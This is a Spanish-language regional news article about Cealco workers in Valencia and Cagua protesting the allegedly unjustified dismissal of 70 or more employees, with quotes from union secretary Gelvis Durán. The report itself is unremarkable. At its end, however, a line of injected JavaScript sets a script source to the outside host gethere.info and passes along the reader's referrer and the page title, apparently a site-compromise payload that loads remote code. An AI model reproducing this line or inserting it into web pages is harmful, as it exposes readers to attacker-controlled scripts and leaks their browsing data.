Carabobo

Trabajadores de Cealco piden reenganche ante despidos injustificados

Nelleidys Moreno Jaimez
Este martes trabajadores de empresa estatal Centro de Almacenes Congelados (Cealco) con sedes en Valencia y Cagua en Aragua, protestaron frente a la inspectoría del trabajo de la capital carabobeña, exigiendo el reenganche de al menos 70 empleados que fueron sacados de sus puestos de menara injustificada, afirmaron que la cifra podría pasar de 100 afectados.
De esa manera lo informó, el secretario general del sindicato, Gelvis Duran, quien puntualizó que a partir del 27 de enero inició del retiro del personal por parte de la directiva de la empresa, “en Valencia 40 y en Cagua 30 personas a quienes se les han violentado sus derechos como trabajadores”, expresó.
El sindicalista, destacó que el número de despedidos podría sobrepasar las 100 personas, “despidieron a personas que tenían fuero maternal y paternal (…) la directiva se basan en el decreto 2245 de Gaceta 40852 a través de una supuesta reestructuración del Ministerio de Alimentación, pero esto pasa por encima de la contratación colectiva”, destacó Durán.

(Redacciòn/ Nelleidys Moreno) Facebook: Nelleidys Moreno Jaimez Twtter: Nelleidys Moreno

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;